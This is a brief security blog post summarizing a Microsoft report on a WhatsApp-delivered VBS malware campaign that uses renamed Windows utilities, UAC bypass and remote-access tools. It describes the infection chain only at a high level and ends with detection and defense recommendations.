WhatsApp as an Entry Point. Microsoft Reports Multi-Stage Windows Malware Using VBS and UAC Bypass

Microsoft has reported an active campaign distributing malicious Visual Basic Script (VBS) files via WhatsApp messages, targeting Windows systems.

The activity has been observed since February 2026 and combines social engineering with system-native tools to establish persistence and remote access.

Campaign Overview

The attack begins with a simple delivery method.

Victims receive VBS files through WhatsApp messages and are tricked into executing them.

Once executed, the script initiates a multi-stage infection chain designed to:

• establish persistence
• escalate privileges
• deploy remote access tools

How the Infection Works

The campaign relies heavily on living-off-the-land techniques.

After execution, the VBS script:

• creates hidden directories under C:\ProgramData
• drops renamed legitimate Windows utilities
  • curl.exe disguised as netapi.dll
  • bitsadmin.exe disguised as sc.exe

These tools are then used to retrieve additional payloads from cloud infrastructure.

Observed hosting platforms include:

• AWS S3
• Tencent Cloud
• Backblaze B2

Privilege Escalation and Persistence

Once initial access is established, the malware attempts to escalate privileges.

This is achieved through:

• repeated attempts to launch elevated processes
• manipulation of User Account Control (UAC) behavior
• registry modifications under system-level paths

The infection chain ultimately deploys malicious MSI packages.

In some cases, legitimate tools such as AnyDesk are installed to provide persistent remote access.

Why This Matters

This campaign is not defined by a single technique.

It is defined by how techniques are combined.

Three key observations:

1. Messaging platforms are part of the attack surface
Delivery does not rely on email or traditional phishing.

2. Legitimate tools reduce detection visibility
Renamed binaries and cloud services blend with normal activity.

3. Persistence is built in stages
Initial execution is only the entry point.

DIAMATIX Perspective

This case reflects a common operational pattern.

The attacker does not rely on exploits.
They rely on execution and progression.

The initial VBS file is only a trigger.

The real risk emerges from:

• use of trusted system tools
• gradual privilege escalation
• integration with legitimate remote access software

Traditional detection often focuses on known malware signatures.

In this case, much of the activity appears legitimate.

Effective defense requires:

• visibility into process behavior, not just binaries
• detection of renamed or repurposed system tools
• monitoring of unusual outbound connections to cloud storage
• correlation between user actions and system-level changes

The entry point may be simple.

The impact depends on how long the activity remains undetected.

Sources

Microsoft Defender Security Research. Analysis of WhatsApp-delivered VBS malware campaign